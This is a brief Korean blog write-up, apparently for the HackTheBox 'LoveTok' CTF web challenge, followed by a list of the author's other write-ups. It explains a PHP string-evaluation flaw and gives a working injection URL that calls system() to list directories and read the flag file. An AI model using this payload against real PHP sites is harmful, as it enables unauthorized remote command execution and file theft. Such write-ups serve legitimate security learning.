HackTheBox LoveTok write-up
2021. 4. 19. 18:10
문제에 접근하면 제일 처음 이런 화면을 볼 수 있다. 사실 문제 소스가 제공되는 문제이다.
format을 입력하면 그에 맞는 포맷으로 시간을 리턴하는 간단한 웹페이지다. 하지만 포맷을 입력할 때 다음과 같은 코드를 사용한다.
PHP에서는 string 안에서 변수에 접근하거나 함수를 실행할 수 있기 때문에 system() 함수를 실행할 수 있다.
http://138.68.182.108:31769/?format={$_GET[0]($_GET[1])}&0=system&1=ls+-al+/;cat+/flagmKC78
끝이다.
'write-ups' 카테고리의 다른 글
| CVE-2022-34265: Potential SQL injection via `Trunc(kind)` and `Extract(lookup_name)` arguments (0) | 2022.07.15 |
|---|---|
| HackTheBox Heist write-up (0) | 2021.05.10 |
| HackTheBox baby website rick write-up (0) | 2021.04.15 |
| HackTheBox baby breaking grad write-up (0) | 2021.04.15 |
| HackTheBox baby todo or not todo write-up (0) | 2021.04.14 |